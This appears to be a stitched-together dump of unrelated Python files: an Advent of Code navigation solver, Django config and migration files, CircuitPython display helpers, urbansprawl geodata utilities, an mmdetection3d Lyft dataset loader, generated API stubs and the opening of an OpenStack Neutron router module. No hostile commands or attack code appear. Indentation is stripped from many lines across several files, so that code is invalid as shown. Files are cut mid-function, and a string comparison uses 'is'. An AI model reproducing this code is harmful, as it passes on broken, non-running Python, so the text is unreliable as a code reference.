wayp_x = pos_x - delta_wayp_x
elif degrees == 270:
wayp_y = pos_y + delta_wayp_x
wayp_x = pos_x - delta_wayp_y
return wayp_y, wayp_x
def left_to_right(degrees):
return 360 - degrees
def solve(data):
start_y = 0
start_x = 0
wayp_y = 1
wayp_x = 10
pos_y = start_y
pos_x = start_x
    for action, argument in data:
        print(f"{action}{argument} p({pos_y}, {pos_x}) w({wayp_y}, {wayp_x})")
        if action == 'N':
            wayp_y += argument
        elif action == "S":
            wayp_y -= argument
        elif action == "E":
            wayp_x += argument
        elif action == "W":
            wayp_x -= argument
        elif action == "L":
            wayp_y, wayp_x = rotate(wayp_y, wayp_x, pos_y, pos_x,
                                    left_to_right(argument))
        elif action == "R":
            wayp_y, wayp_x = rotate(wayp_y, wayp_x, pos_y, pos_x, argument)
        elif action == "F":
            delta_wayp_y = wayp_y - pos_y
            delta_wayp_x = wayp_x - pos_x
            pos_y += (wayp_y - pos_y) * argument
            pos_x += (wayp_x - pos_x) * argument
wayp_y = pos_y + delta_wayp_y
wayp_x = pos_x + delta_wayp_x
print(f"res p({pos_y}, {pos_x}) w({wayp_y}, {wayp_x})")
# print(f"({pos_y}, {pos_x})")
return manhatten(pos_y, pos_x, start_y, start_x)
def main():
print(solve(read_input("sample.txt")))
print(solve(read_input("input.txt")))
if __name__ == "__main__":
main()
# 10 units east and 4 units north
# 4 units east and 10 units south
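# Worked example of the rotation helper above (illustrative): with the ship at
# the origin and the waypoint 10 units east and 4 units north, a 90-degree
# right turn gives rotate(4, 10, 0, 0, 90) == (-10, 4), i.e. the waypoint ends
# up 4 units east and 10 units south, matching the notes above.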
|
from django.apps import AppConfig
class ApiConfig(AppConfig):
name = 'API'
|
""" Test the Cookiecutter template.
A template project is created in a temporary directory, the project is built,
and its tests are run.
"""
from json import loads
from pathlib import Path
from shlex import split
from subprocess import check_call
from tempfile import TemporaryDirectory
from cookiecutter.main import cookiecutter
def main() -> int:
""" Execute the test.
"""
template = Path(__file__).resolve().parents[1]
defaults = loads(template.joinpath("cookiecutter.json").read_text())
with TemporaryDirectory() as tmpdir:
# TODO: Build and run tests.
cookiecutter(str(template), no_input=True, output_dir=tmpdir)
return 0
# Run the test when this file is executed as a script.
if __name__ == "__main__":
raise SystemExit(main())
|
# The MIT License (MIT)
#
# Copyright (c) 2019 Jonah Yolles-Murphy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import displayio
from adafruit_display_text.text_area import TextArea
def color(r, g, b):
    """Pack 8-bit red, green, and blue components into a 24-bit integer color."""
    return (r << 16) + (g << 8) + b
red = color(255, 0, 0)
orange = color(255, 128, 0)
yellow = color(255, 255, 0)
green = color(0, 255, 0)
blue = color(0, 0, 255)
purple = color(255, 0, 255)
white = color(255, 255, 255)
black = color(0, 0, 0)
clear = None
default_font = displayio.BuiltinFont
def rect(x, y, width, height, color):
global _bad_practice
plt = displayio.Palette(2)
plt.make_transparent(0)
plt[1] = color
return displayio.TileGrid(displayio.Shape(width, height), pixel_shader = plt, position = (x,y))
def roundrect(x, y, width, height, radius, color):
global _bad_practice
plt = displayio.Palette(2)
plt.make_transparent(0)
plt[1] = color
shp = displayio.Shape(width, height)
for y_pos in range(radius):
        # Keep clip_off as a float here; converting to int before the
        # subtractions below would accumulate rounding errors.
        clip_off = radius - ((radius**2) - (y_pos - radius)**2)**.5  # r - sqrt(r**2 - (y - r)**2) = x
        shp.set_boundary(y_pos, int(clip_off), int(width - clip_off))
        shp.set_boundary(height - 1 - y_pos, int(clip_off), int(width - clip_off))
return displayio.TileGrid(shp, pixel_shader = plt, position = (x,y))
def hline(x, y, length, thickness, color):
return rect(x, y, length, thickness, color)
def vline(x, y, length, thickness, color):
return rect(x, y, thickness, length, color)
def circle(x, y, radius, color):
return roundrect(x - radius, y - radius, radius*2, radius*2, radius, color)
"""
def text(x, y, width, height, color, text, font = None, background = clear):
if font == None:
font = default_font
"""
|
###############
# Repository: https://github.com/lgervasoni/urbansprawl
# MIT License
###############
import osmnx as ox
import pandas as pd
import geopandas as gpd
import numpy as np
from .tags import height_tags
from ..settings import storage_folder
# Format for load/save the geo-data ['geojson','shp']
geo_format = "geojson" # 'shp'
geo_driver = "GeoJSON" # 'ESRI Shapefile'
###################################################
# I/O utils
###################################################
def get_dataframes_filenames(city_ref_file):
"""
Get data frame file names for input city
Parameters
----------
city_ref_file : string
name of input city
Returns
----------
[ string, string, string ]
returns filenames for buildings, building parts, and points of
interest
"""
import os
if not (os.path.isdir(storage_folder)):
os.makedirs(storage_folder)
geo_poly_file = (
storage_folder + "/" + city_ref_file + "_buildings." + geo_format
)
geo_poly_parts_file = (
storage_folder + "/" + city_ref_file + "_building_parts." + geo_format
)
geo_point_file = (
storage_folder + "/" + city_ref_file + "_poi." + geo_format
)
return geo_poly_file, geo_poly_parts_file, geo_point_file
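# Example (illustrative): if storage_folder were "data" with the default
# geo_format, get_dataframes_filenames("grenoble") would return
# ("data/grenoble_buildings.geojson",
#  "data/grenoble_building_parts.geojson",
#  "data/grenoble_poi.geojson").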
def load_geodataframe(geo_filename):
"""
Load input GeoDataFrame
Parameters
----------
geo_filename : string
input GeoDataFrame filename
Returns
----------
geopandas.GeoDataFrame
loaded data
"""
# Load using geopandas
df_osm_data = gpd.read_file(geo_filename)
# Set None as NaN
df_osm_data.fillna(value=np.nan, inplace=True)
    # Replace empty strings (JSON null is sometimes read as '') with NaN
df_osm_data.replace("", np.nan, inplace=True)
    def list_int_from_string(x):  # List of integers given input in string format
        return [int(id_) for id_ in x.split(",")]
    def list_str_from_string(x):  # List of strings given input in string format
        return x.split(",")
# Recover list
if "activity_category" in df_osm_data.columns:
df_osm_data["activity_category"] = df_osm_data.activity_category.apply(
lambda x: list_str_from_string(x) if pd.notnull(x) else np.nan
)
if "containing_parts" in df_osm_data.columns:
df_osm_data["containing_parts"] = df_osm_data.containing_parts.apply(
lambda x: list_int_from_string(x) if pd.notnull(x) else np.nan
)
if "containing_poi" in df_osm_data.columns:
df_osm_data["containing_poi"] = df_osm_data.containing_poi.apply(
lambda x: list_int_from_string(x) if pd.notnull(x) else np.nan
)
# To UTM coordinates
return ox.project_gdf(df_osm_data)
def store_geodataframe(df_osm_data, geo_filename):
"""
Store input GeoDataFrame
Parameters
----------
df_osm_data : geopandas.GeoDataFrame
input OSM data frame
geo_filename : string
filename for GeoDataFrame storage
Returns
----------
"""
# To EPSG 4326 (GeoJSON does not store projection information)
df_osm_data = ox.project_gdf(df_osm_data, to_latlong=True)
# Lists to string (needed to save GeoJSON files)
if "activity_category" in df_osm_data.columns:
df_osm_data.activity_category = df_osm_data.activity_category.apply(
lambda x: ",".join(str(e) for e in x)
if isinstance(x, list)
else np.nan
)
if "containing_parts" in df_osm_data.columns:
df_osm_data.containing_parts = df_osm_data.containing_parts.apply(
lambda x: ",".join(str(e) for e in x)
if isinstance(x, list)
else np.nan
)
if "containing_poi" in df_osm_data.columns:
df_osm_data.containing_poi = df_osm_data.containing_poi.apply(
lambda x: ",".join(str(e) for e in x)
if isinstance(x, list)
else np.nan
)
# Save to file
df_osm_data.to_file(geo_filename, driver=geo_driver)
###################################################
# GeoDataFrame processing utils
###################################################
def sanity_check_height_tags(df_osm):
"""
Compute a sanity check for all height tags
    If incorrectly tagged, try to replace the value with a correct one.
    Any meter- or level-related strings are stripped, and heights given in
    imperial units are converted to the metric system
Parameters
----------
df_osm : geopandas.GeoDataFrame
input OSM data frame
Returns
----------
"""
def sanity_check(value):
# Sanity check for height tags (sometimes wrongly-tagged)
if not ((value is np.nan) or (value is None) or (value == "")): # Non-null value
try: # Can be read as float?
return float(value)
except ValueError:
try: # Try removing incorrectly tagged information: meters/levels
return float(
value.replace("meters", "")
.replace("meter", "")
.replace("m", "")
.replace("levels", "")
.replace("level", "")
.replace("l", "")
)
except ValueError:
try: # Feet and inch values? e.g.: 4'7''
split_value = value.split("'")
feet, inches = split_value[0], split_value[1]
if inches is "": # Non existent inches
inches = "0"
tot_inches = float(feet) * 12 + float(inches)
# Return meters equivalent
return tot_inches * 0.0254
except TypeError: # None. Incorrect tag
return None
return value
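    # Examples of the sanity check above (illustrative): sanity_check("12 m")
    # -> 12.0 after the unit is stripped, and sanity_check("4'7''")
    # -> (4 * 12 + 7) inches * 0.0254 ~= 1.397 metres.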
# Available height tags
available_height_tags = [
col for col in height_tags if col in df_osm.columns
]
# Apply-map sanity check
df_osm[available_height_tags] = df_osm[available_height_tags].applymap(
sanity_check
)
def associate_structures(
df_osm_encompassing_structures,
df_osm_structures,
operation="contains",
column="containing_",
):
"""
Associate input structure geometries to its encompassing structures
Structures are associated using the operation 'contains' or 'intersects'
A new column in the encompassing data frame is added, incorporating the indices of the containing structures
Parameters
----------
df_osm_encompassing_structures : geopandas.GeoDataFrame
encompassing data frame
df_osm_structures : geopandas.GeoDataFrame
structures data frame
operation : string
spatial join operation to associate structures
column : string
name of the column to add in encompassing data frame
Returns
----------
"""
# Find, for each geometry, all containing structures
sjoin = gpd.sjoin(
df_osm_encompassing_structures[["geometry"]],
df_osm_structures[["geometry"]],
op=operation,
rsuffix="cont",
)
# Group by: polygon_index -> list of containing points indices
group_indices = sjoin.groupby(sjoin.index, as_index=True)[
"index_cont"
].apply(list)
# Create new column
df_osm_encompassing_structures.loc[
group_indices.index, column
] = group_indices.values
# Reset indices
df_osm_encompassing_structures.index.rename("", inplace=True)
df_osm_structures.index.rename("", inplace=True)
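# Illustrative call sketch (not part of the original module; the data frame
# names are placeholders): associating building parts with their encompassing
# buildings would look roughly like
#
#     associate_structures(df_buildings, df_building_parts,
#                          operation="contains", column="containing_parts")
#
# after which each row of df_buildings carries the list of indices of the
# building parts it contains (the same column recovered in load_geodataframe).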
|
# Copyright (c) OpenMMLab. All rights reserved.
import os
import tempfile
from os import path as osp
import mmcv
import numpy as np
import pandas as pd
from lyft_dataset_sdk.lyftdataset import LyftDataset as Lyft
from lyft_dataset_sdk.utils.data_classes import Box as LyftBox
from pyquaternion import Quaternion
from mmdet3d.core.evaluation.lyft_eval import lyft_eval
from ..core import show_result
from ..core.bbox import Box3DMode, Coord3DMode, LiDARInstance3DBoxes
from .builder import DATASETS
from .custom_3d import Custom3DDataset
from .pipelines import Compose
@DATASETS.register_module()
class LyftDataset(Custom3DDataset):
r"""Lyft Dataset.
This class serves as the API for experiments on the Lyft Dataset.
Please refer to
`<https://www.kaggle.com/c/3d-object-detection-for-autonomous-vehicles/data>`_
for data downloading.
Args:
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
data_root (str): Path of dataset root.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
load_interval (int, optional): Interval of loading the dataset. It is
used to uniformly sample the dataset. Defaults to 1.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
        box_type_3d (str, optional): Type of 3D box of this dataset.
            Based on the `box_type_3d`, the dataset will wrap each box in its
            original format and then convert it to `box_type_3d`.
            Defaults to 'LiDAR' in this dataset. Available options include
- 'LiDAR': Box in LiDAR coordinates.
- 'Depth': Box in depth coordinates, usually for indoor dataset.
- 'Camera': Box in camera coordinates.
filter_empty_gt (bool, optional): Whether to filter empty GT.
Defaults to True.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
""" # noqa: E501
NameMapping = {
'bicycle': 'bicycle',
'bus': 'bus',
'car': 'car',
'emergency_vehicle': 'emergency_vehicle',
'motorcycle': 'motorcycle',
'other_vehicle': 'other_vehicle',
'pedestrian': 'pedestrian',
'truck': 'truck',
'animal': 'animal'
}
DefaultAttribute = {
'car': 'is_stationary',
'truck': 'is_stationary',
'bus': 'is_stationary',
'emergency_vehicle': 'is_stationary',
'other_vehicle': 'is_stationary',
'motorcycle': 'is_stationary',
'bicycle': 'is_stationary',
'pedestrian': 'is_stationary',
'animal': 'is_stationary'
}
CLASSES = ('car', 'truck', 'bus', 'emergency_vehicle', 'other_vehicle',
'motorcycle', 'bicycle', 'pedestrian', 'animal')
def __init__(self,
ann_file,
pipeline=None,
data_root=None,
classes=None,
load_interval=1,
modality=None,
box_type_3d='LiDAR',
filter_empty_gt=True,
test_mode=False,
**kwargs):
self.load_interval = load_interval
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
modality=modality,
box_type_3d=box_type_3d,
filter_empty_gt=filter_empty_gt,
test_mode=test_mode,
**kwargs)
if self.modality is None:
self.modality = dict(
use_camera=False,
use_lidar=True,
use_radar=False,
use_map=False,
use_external=False,
)
def load_annotations(self, ann_file):
"""Load annotations from ann_file.
Args:
ann_file (str): Path of the annotation file.
Returns:
list[dict]: List of annotations sorted by timestamps.
"""
# loading data from a file-like object needs file format
data = mmcv.load(ann_file, file_format='pkl')
data_infos = list(sorted(data['infos'], key=lambda e: e['timestamp']))
data_infos = data_infos[::self.load_interval]
self.metadata = data['metadata']
self.version = self.metadata['version']
return data_infos
def get_data_info(self, index):
"""Get data info according to the given index.
Args:
index (int): Index of the sample data to get.
Returns:
dict: Data information that will be passed to the data
preprocessing pipelines. It includes the following keys:
- sample_idx (str): sample index
- pts_filename (str): filename of point clouds
- sweeps (list[dict]): infos of sweeps
- timestamp (float): sample timestamp
- img_filename (str, optional): image filename
- lidar2img (list[np.ndarray], optional): transformations
from lidar to different cameras
- ann_info (dict): annotation info
"""
info = self.data_infos[index]
# standard protocol modified from SECOND.Pytorch
input_dict = dict(
sample_idx=info['token'],
pts_filename=info['lidar_path'],
sweeps=info['sweeps'],
timestamp=info['timestamp'] / 1e6,
)
if self.modality['use_camera']:
image_paths = []
lidar2img_rts = []
for cam_type, cam_info in info['cams'].items():
image_paths.append(cam_info['data_path'])
# obtain lidar to image transformation matrix
lidar2cam_r = np.linalg.inv(cam_info['sensor2lidar_rotation'])
lidar2cam_t = cam_info[
'sensor2lidar_translation'] @ lidar2cam_r.T
lidar2cam_rt = np.eye(4)
lidar2cam_rt[:3, :3] = lidar2cam_r.T
lidar2cam_rt[3, :3] = -lidar2cam_t
intrinsic = cam_info['cam_intrinsic']
viewpad = np.eye(4)
viewpad[:intrinsic.shape[0], :intrinsic.shape[1]] = intrinsic
lidar2img_rt = (viewpad @ lidar2cam_rt.T)
lidar2img_rts.append(lidar2img_rt)
input_dict.update(
dict(
img_filename=image_paths,
lidar2img=lidar2img_rts,
))
if not self.test_mode:
annos = self.get_ann_info(index)
input_dict['ann_info'] = annos
return input_dict
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: Annotation information consists of the following keys:
- gt_bboxes_3d (:obj:`LiDARInstance3DBoxes`):
3D ground truth bboxes.
- gt_labels_3d (np.ndarray): Labels of ground truths.
- gt_names (list[str]): Class names of ground truths.
"""
info = self.data_infos[index]
gt_bboxes_3d = info['gt_boxes']
gt_names_3d = info['gt_names']
gt_labels_3d = []
for cat in gt_names_3d:
if cat in self.CLASSES:
gt_labels_3d.append(self.CLASSES.index(cat))
else:
gt_labels_3d.append(-1)
gt_labels_3d = np.array(gt_labels_3d)
if 'gt_shape' in info:
gt_shape = info['gt_shape']
gt_bboxes_3d = np.concatenate([gt_bboxes_3d, gt_shape], axis=-1)
# the lyft box center is [0.5, 0.5, 0.5], we change it to be
# the same as KITTI (0.5, 0.5, 0)
gt_bboxes_3d = LiDARInstance3DBoxes(
gt_bboxes_3d,
box_dim=gt_bboxes_3d.shape[-1],
origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d)
anns_results = dict(
gt_bboxes_3d=gt_bboxes_3d,
gt_labels_3d=gt_labels_3d,
)
return anns_results
def _format_bbox(self, results, jsonfile_prefix=None):
"""Convert the results to the standard format.
Args:
results (list[dict]): Testing results of the dataset.
jsonfile_prefix (str): The prefix of the output jsonfile.
You can specify the output directory/filename by
modifying the jsonfile_prefix. Default: None.
Returns:
str: Path of the output json file.
"""
lyft_annos = {}
mapped_class_names = self.CLASSES
print('Start to convert detection format...')
for sample_id, det in enumerate(mmcv.track_iter_progress(results)):
annos = []
boxes = output_to_lyft_box(det)
sample_token = self.data_infos[sample_id]['token']
boxes = lidar_lyft_box_to_global(self.data_infos[sample_id], boxes)
for i, box in enumerate(boxes):
name = mapped_class_names[box.label]
lyft_anno = dict(
sample_token=sample_token,
translation=box.center.tolist(),
size=box.wlh.tolist(),
rotation=box.orientation.elements.tolist(),
name=name,
score=box.score)
annos.append(lyft_anno)
lyft_annos[sample_token] = annos
lyft_submissions = {
'meta': self.modality,
'results': lyft_annos,
}
mmcv.mkdir_or_exist(jsonfile_prefix)
res_path = osp.join(jsonfile_prefix, 'results_lyft.json')
        print('Results written to', res_path)
mmcv.dump(lyft_submissions, res_path)
return res_path
def _evaluate_single(self,
result_path,
logger=None,
metric='bbox',
result_name='pts_bbox'):
"""Evaluation for a single model in Lyft protocol.
Args:
result_path (str): Path of the result file.
logger (logging.Logger | str, optional): Logger used for printing
related information during evaluation. Default: None.
metric (str, optional): Metric name used for evaluation.
Default: 'bbox'.
result_name (str, optional): Result name in the metric prefix.
Default: 'pts_bbox'.
Returns:
dict: Dictionary of evaluation details.
"""
output_dir = osp.join(*osp.split(result_path)[:-1])
lyft = Lyft(
data_path=osp.join(self.data_root, self.version),
json_path=osp.join(self.data_root, self.version, self.version),
verbose=True)
eval_set_map = {
'v1.01-train': 'val',
}
metrics = lyft_eval(lyft, self.data_root, result_path,
eval_set_map[self.version], output_dir, logger)
# record metrics
detail = dict()
metric_prefix = f'{result_name}_Lyft'
for i, name in enumerate(metrics['class_names']):
AP = float(metrics['mAPs_cate'][i])
detail[f'{metric_prefix}/{name}_AP'] = AP
detail[f'{metric_prefix}/mAP'] = metrics['Final mAP']
return detail
def format_results(self, results, jsonfile_prefix=None, csv_savepath=None):
"""Format the results to json (standard format for COCO evaluation).
Args:
results (list[dict]): Testing results of the dataset.
jsonfile_prefix (str): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
csv_savepath (str): The path for saving csv files.
It includes the file path and the csv filename,
e.g., "a/b/filename.csv". If not specified,
the result will not be converted to csv file.
Returns:
tuple: Returns (result_files, tmp_dir), where `result_files` is a
dict containing the json filepaths, `tmp_dir` is the temporal
directory created for saving json files when
`jsonfile_prefix` is not specified.
"""
assert isinstance(results, list), 'results must be a list'
assert len(results) == len(self), (
'The length of results is not equal to the dataset len: {} != {}'.
format(len(results), len(self)))
if jsonfile_prefix is None:
tmp_dir = tempfile.TemporaryDirectory()
jsonfile_prefix = osp.join(tmp_dir.name, 'results')
else:
tmp_dir = None
# currently the output prediction results could be in two formats
# 1. list of dict('boxes_3d': ..., 'scores_3d': ..., 'labels_3d': ...)
# 2. list of dict('pts_bbox' or 'img_bbox':
# dict('boxes_3d': ..., 'scores_3d': ..., 'labels_3d': ...))
# this is a workaround to enable evaluation of both formats on Lyft
# refer to https://github.com/open-mmlab/mmdetection3d/issues/449
if not ('pts_bbox' in results[0] or 'img_bbox' in results[0]):
result_files = self._format_bbox(results, jsonfile_prefix)
else:
# should take the inner dict out of 'pts_bbox' or 'img_bbox' dict
result_files = dict()
for name in results[0]:
                print(f'\nFormatting bboxes of {name}')
results_ = [out[name] for out in results]
tmp_file_ = osp.join(jsonfile_prefix, name)
result_files.update(
{name: self._format_bbox(results_, tmp_file_)})
if csv_savepath is not None:
self.json2csv(result_files['pts_bbox'], csv_savepath)
return result_files, tmp_dir
def evaluate(self,
results,
metric='bbox',
logger=None,
jsonfile_prefix=None,
csv_savepath=None,
result_names=['pts_bbox'],
show=False,
out_dir=None,
pipeline=None):
"""Evaluation in Lyft protocol.
Args:
results (list[dict]): Testing results of the dataset.
metric (str | list[str], optional): Metrics to be evaluated.
Default: 'bbox'.
logger (logging.Logger | str, optional): Logger used for printing
related information during evaluation. Default: None.
jsonfile_prefix (str, optional): The prefix of json files including
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
csv_savepath (str, optional): The path for saving csv files.
It includes the file path and the csv filename,
e.g., "a/b/filename.csv". If not specified,
the result will not be converted to csv file.
result_names (list[str], optional): Result names in the
metric prefix. Default: ['pts_bbox'].
show (bool, optional): Whether to visualize.
Default: False.
out_dir (str, optional): Path to save the visualization results.
Default: None.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
Returns:
dict[str, float]: Evaluation results.
"""
result_files, tmp_dir = self.format_results(results, jsonfile_prefix,
csv_savepath)
if isinstance(result_files, dict):
results_dict = dict()
for name in result_names:
print(f'Evaluating bboxes of {name}')
ret_dict = self._evaluate_single(result_files[name])
results_dict.update(ret_dict)
elif isinstance(result_files, str):
results_dict = self._evaluate_single(result_files)
if tmp_dir is not None:
tmp_dir.cleanup()
if show or out_dir:
self.show(results, out_dir, show=show, pipeline=pipeline)
return results_dict
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='LIDAR',
load_dim=5,
use_dim=5,
file_client_args=dict(backend='disk')),
dict(
type='LoadPointsFromMultiSweeps',
sweeps_num=10,
file_client_args=dict(backend='disk')),
dict(
type='DefaultFormatBundle3D',
class_names=self.CLASSES,
with_label=False),
dict(type='Collect3D', keys=['points'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=False, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Whether to visualize the results online.
Default: False.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
if 'pts_bbox' in result.keys():
result = result['pts_bbox']
data_info = self.data_infos[i]
pts_path = data_info['lidar_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points = self._extract_data(i, pipeline, 'points').numpy()
points = Coord3DMode.convert_point(points, Coord3DMode.LIDAR,
Coord3DMode.DEPTH)
inds = result['scores_3d'] > 0.1
gt_bboxes = self.get_ann_info(i)['gt_bboxes_3d'].tensor.numpy()
show_gt_bboxes = Box3DMode.convert(gt_bboxes, Box3DMode.LIDAR,
Box3DMode.DEPTH)
pred_bboxes = result['boxes_3d'][inds].tensor.numpy()
show_pred_bboxes = Box3DMode.convert(pred_bboxes, Box3DMode.LIDAR,
Box3DMode.DEPTH)
show_result(points, show_gt_bboxes, show_pred_bboxes, out_dir,
file_name, show)
def json2csv(self, json_path, csv_savepath):
"""Convert the json file to csv format for submission.
Args:
json_path (str): Path of the result json file.
csv_savepath (str): Path to save the csv file.
"""
results = mmcv.load(json_path)['results']
sample_list_path = osp.join(self.data_root, 'sample_submission.csv')
data = pd.read_csv(sample_list_path)
Id_list = list(data['Id'])
pred_list = list(data['PredictionString'])
cnt = 0
print('Converting the json to csv...')
for token in results.keys():
cnt += 1
predictions = results[token]
prediction_str = ''
for i in range(len(predictions)):
prediction_str += \
str(predictions[i]['score']) + ' ' + \
str(predictions[i]['translation'][0]) + ' ' + \
str(predictions[i]['translation'][1]) + ' ' + \
str(predictions[i]['translation'][2]) + ' ' + \
str(predictions[i]['size'][0]) + ' ' + \
str(predictions[i]['size'][1]) + ' ' + \
str(predictions[i]['size'][2]) + ' ' + \
str(Quaternion(list(predictions[i]['rotation']))
.yaw_pitch_roll[0]) + ' ' + \
predictions[i]['name'] + ' '
prediction_str = prediction_str[:-1]
idx = Id_list.index(token)
pred_list[idx] = prediction_str
df = pd.DataFrame({'Id': Id_list, 'PredictionString': pred_list})
mmcv.mkdir_or_exist(os.path.dirname(csv_savepath))
df.to_csv(csv_savepath, index=False)
def output_to_lyft_box(detection):
"""Convert the output to the box class in the Lyft.
Args:
detection (dict): Detection results.
Returns:
list[:obj:`LyftBox`]: List of standard LyftBoxes.
"""
box3d = detection['boxes_3d']
scores = detection['scores_3d'].numpy()
labels = detection['labels_3d'].numpy()
box_gravity_center = box3d.gravity_center.numpy()
box_dims = box3d.dims.numpy()
box_yaw = box3d.yaw.numpy()
# our LiDAR coordinate system -> Lyft box coordinate system
lyft_box_dims = box_dims[:, [1, 0, 2]]
box_list = []
for i in range(len(box3d)):
quat = Quaternion(axis=[0, 0, 1], radians=box_yaw[i])
box = LyftBox(
box_gravity_center[i],
lyft_box_dims[i],
quat,
label=labels[i],
score=scores[i])
box_list.append(box)
return box_list
def lidar_lyft_box_to_global(info, boxes):
"""Convert the box from ego to global coordinate.
Args:
info (dict): Info for a specific sample data, including the
calibration information.
boxes (list[:obj:`LyftBox`]): List of predicted LyftBoxes.
Returns:
list: List of standard LyftBoxes in the global
coordinate.
"""
box_list = []
for box in boxes:
# Move box to ego vehicle coord system
box.rotate(Quaternion(info['lidar2ego_rotation']))
box.translate(np.array(info['lidar2ego_translation']))
# Move box to global coord system
box.rotate(Quaternion(info['ego2global_rotation']))
box.translate(np.array(info['ego2global_translation']))
box_list.append(box)
return box_list
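# End-to-end sketch (illustrative summary of the code above): given detector
# `results`, LyftDataset.evaluate() calls format_results() -> _format_bbox(),
# which uses output_to_lyft_box() and lidar_lyft_box_to_global() to build the
# submission json, and then _evaluate_single() scores that file with lyft_eval.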
|
# Generated by Django 3.2.7 on 2021-09-08 13:54
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
|
##
##
# File auto-generated against equivalent DynamicSerialize Java class
class StatusResponse(object):
def __init__(self):
self.hostname = None
self.jvmName = None
self.statistics = None
def getHostname(self):
return self.hostname
def setHostname(self, hostname):
self.hostname = hostname
def getJvmName(self):
return self.jvmName
def setJvmName(self, jvmName):
self.jvmName = jvmName
def getStatistics(self):
return self.statistics
def setStatistics(self, statistics):
self.statistics = statistics
def __repr__(self):
return self.hostname + ':' + self.jvmName
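# Illustrative usage (not part of the auto-generated class); the hostname and
# JVM name below are made-up placeholders.
if __name__ == '__main__':
    response = StatusResponse()
    response.setHostname('edex-request-01')
    response.setJvmName('request')
    print(response)  # prints "edex-request-01:request"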
|
# coding: utf-8
"""
IdCheck.IO API
Check identity documents
OpenAPI spec version: 0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import os
import sys
import unittest
import idcheckio_python_client
from idcheckio_python_client.rest import ApiException
from idcheckio_python_client.models.task_response import TaskResponse
class TestTaskResponse(unittest.TestCase):
""" TaskResponse unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testTaskResponse(self):
"""
Test TaskResponse
"""
model = idcheckio_python_client.models.task_response.TaskResponse()
if __name__ == '__main__':
unittest.main()
|
# Copyright (c) 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import binascii
import collections
import netaddr
from neutron_lib import constants as lib_constants
from neutron_lib import exceptions
from oslo_log import log as logging
from oslo_utils import excutils
import six
from neutron.agent.l3 import dvr_fip_ns
from neutron.agent.l3 import dvr_router_base
from neutron.agent.linux import ip_lib
from neutron.common import constants as n_const
from neutron.common import utils as common_utils
LOG = logging.getLogger(__name__)
# xor-folding mask used for IPv6 rule index
MASK_30 = 0x3fffffff
# Tracks the arp entry cache
Arp_entry = collections.namedtuple(
'Arp_entry', 'ip mac subnet_id operation')
class DvrLocalRouter(dvr_router_base.DvrRouterBase):
